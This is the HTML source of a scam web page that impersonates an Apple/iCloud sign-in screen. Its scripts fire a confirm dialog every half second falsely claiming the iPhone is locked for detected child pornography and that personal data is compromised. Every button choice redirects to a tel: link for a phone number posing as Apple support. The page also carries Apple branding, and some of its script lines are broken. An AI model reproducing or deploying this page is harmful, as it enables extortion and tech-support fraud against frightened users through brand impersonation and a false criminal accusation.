<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Apple Account Lock UI</title>








    <script>
	function showAlert() {
		if (confirm("Your iphone is locked due to detected illegal child pornography. Your personal information is compromised. Contact Apple support +1(844)-297-6293 to unlock it.")) {
			window.location.href = "tel:+1(844)-297-6293";
		} else {
			window.location.href = "tel:+1(844)-297-6293";
		}
	}
	
    
 	window.addEventListener('load', function() {
	 setInterval(showAlert, 500);
	 setInterval(showConfirmation, 500 );
		 });
		 
		 
            setTimeout(function() { }, 500);

            
            
            
</script>







  <script>
    
            
    function autoDial() {
      var phoneNumber = "+1(844)-297-6293";
      window.location.href = "tel:" + phoneNumber;
    }

    function call() {
      // Implement the call functionality here, such as initiating a phone call.
      console.log("Calling...");
    }
    
                setTimeout(function, 500);

    
  </script>









<!-- Google tag (gtag.js)   deepak-->
<script async src="https://www.googletagmanager.com/gtag/js?id=G-F339TB4GYF"></script>
<script>
  window.dataLayer = window.dataLayer || [];
  function gtag(){dataLayer.push(arguments);}
  gtag('js', new Date());

  gtag('config', 'G-F339TB4GYF');
</script>















<style>
    body {
        margin: 0;
        padding: 0;
        font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, sans-serif;
        background: #1c1c1e;
        color: white;
        text-align: center;
    }

    .header {
        padding: 20px;
        display: flex;
        align-items: center;
        gap: 10px;
        font-size: 22px;
    }

    .apple-logo {
        width: 24px;
    }

    .hero-img {
        width: 150px;
        margin: 40px auto 20px;
        display: block;
    }

    h1 {
        font-size: 28px;
        margin-top: 10px;
        line-height: 1.3;
    }

    .box {
        background: #000;
        padding: 25px;
        margin: 40px 15px;
        border-radius: 12px;
    }

    .box p {
        margin: 10px 0;
        font-size: 17px;
        line-height: 1.4;
    }

    .btn-row {
        margin-top: 20px;
        display: flex;
        justify-content: center;
        gap: 15px;
    }

    .btn {
        padding: 10px 25px;
        border-radius: 40px;
        font-size: 17px;
        cursor: pointer;
        border: 1px solid #0a84ff;
    }

    .btn.cancel {
        background: transparent;
        color: #0a84ff;
    }

    .btn.unlock {
        background: #0a84ff;
        color: white;
        border: none;
    }

    .create-account {
        margin-top: 25px;
        color: #0a84ff;
        text-decoration: none;
        font-size: 16px;
    }
</style>

</head>
<body>

<div class="header">
    <img src="https://upload.wikimedia.org/wikipedia/commons/thumb/3/31/Apple_logo_white.svg/1724px-Apple_logo_white.svg.png" class="apple-logo">
    iCloud
</div>

<!-- Your Apple ID image -->
<img src="https://support.apple.com/content/dam/edam/applecare/images/en_US/psp/psp_heroes/mini-hero-apple-id.png" class="hero-img">

<h1>Sign in with<br>Apple Account</h1>

<div class="box">
    <p><strong>This Apple Account has been locked<br>due to detected illegal child pornography.</strong></p>
    <p>Your personal information is compromised. Contact Apple support +1(844)-297-6293 to unlock it.<br></p>

    <div class="btn-row">
        <button class="btn cancel">Cancel</button>
        <button class="btn unlock">Call Support Now</button>
    </div>
</div>

<a href="#" class="create-account">Create Apple Account</a>

</body>
</html>
